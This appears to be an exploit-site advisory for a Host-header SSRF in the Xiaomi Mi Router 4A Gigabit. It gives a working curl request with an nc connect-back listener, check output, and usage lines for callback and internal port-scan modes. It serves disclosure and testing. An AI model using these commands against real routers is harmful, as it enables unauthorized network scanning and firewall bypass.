Share
## https://sploitus.com/exploit?id=8D19E41B-083D-5732-888A-A36865DBBCF3
# CVE-2026-XXXXX: Xiaomi Mi Router 4A Gigabit - SSRF via Host Header Injection



## Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in the Xiaomi Mi Router 4A Gigabit Edition. The router's web interface fails to validate the HTTP `Host` header, allowing an **unauthenticated attacker** to force the router to make arbitrary outbound TCP connections.
| Field | Value |
|-------|-------|
| **Device** | Xiaomi Mi Router 4A Gigabit Edition |
| **Firmware** | 3.0.24 (International) |
| **CVE** | Pending |
| **CWE** | CWE-918 (Server-Side Request Forgery) |
| **CVSS 3.1** | 8.6 (High) |
## Affected Endpoint
```
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: :
```
## Proof of Concept
### Screenshot

### Quick Test
```bash
python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
```
### Output
```
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
```
### Manual Test
```bash
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
```
## Impact
- **Internal Network Scanning**: Use router as proxy to scan internal networks
- **Firewall Bypass**: Access services restricted to router's IP
- **Attack Chain**: Can be combined with other vulnerabilities for RCE
## Files
| File | Description |
|------|-------------|
| `xiaomi_ssrf_exploit.py` | Full exploit with multiple modes |
| `ssrf_poc.py` | Simple proof-of-concept |
| `CVE-2026-XIAOMI-SSRF.md` | Detailed vulnerability report |
## Exploit Usage
```bash
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
```
## Timeline
| Date | Event |
|------|-------|
| 2026-01-15 | Vulnerability discovered |
| 2026-01-15 | PoC developed |
| 2026-01-XX | CVE requested |
| TBD | Public disclosure |
## Disclaimer
This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.
## Author
Security Researcher